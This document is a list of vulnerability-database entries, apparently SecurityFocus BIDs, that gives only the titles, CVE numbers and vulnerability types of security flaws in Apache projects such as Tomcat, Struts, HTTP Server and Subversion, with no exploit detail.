9460| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
9461| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
9462| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
9463| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
9464| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
9465| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
9466| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
9467| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
9468| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
9469| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
9470| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
9471| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
9472| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
9473| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
9474| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
9475| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
9476| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
9477| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
9478| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
9479| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
9480| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
9481| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
9482| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
9483| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
9484| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
9485| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
9486| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
9487| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
9488| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
9489| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
9490| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
9491| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
9492| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
9493| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
| [91736] Apache XML-RPC Multiple Security Vulnerabilities
| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
| [90482] Apache CVE-2004-1387 Local Security Vulnerability
| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
| [86399] Apache CVE-2007-1743 Local Security Vulnerability
| [86397] Apache CVE-2007-1742 Local Security Vulnerability
| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
| [76933] Apache James Server Unspecified Command Execution Vulnerability
| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
| [68229] Apache Harmony PRNG Entropy Weakness
| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
| [64780] Apache CloudStack Unauthorized Access Vulnerability
| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
| [59670] Apache VCL Multiple Input Validation Vulnerabilities
| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
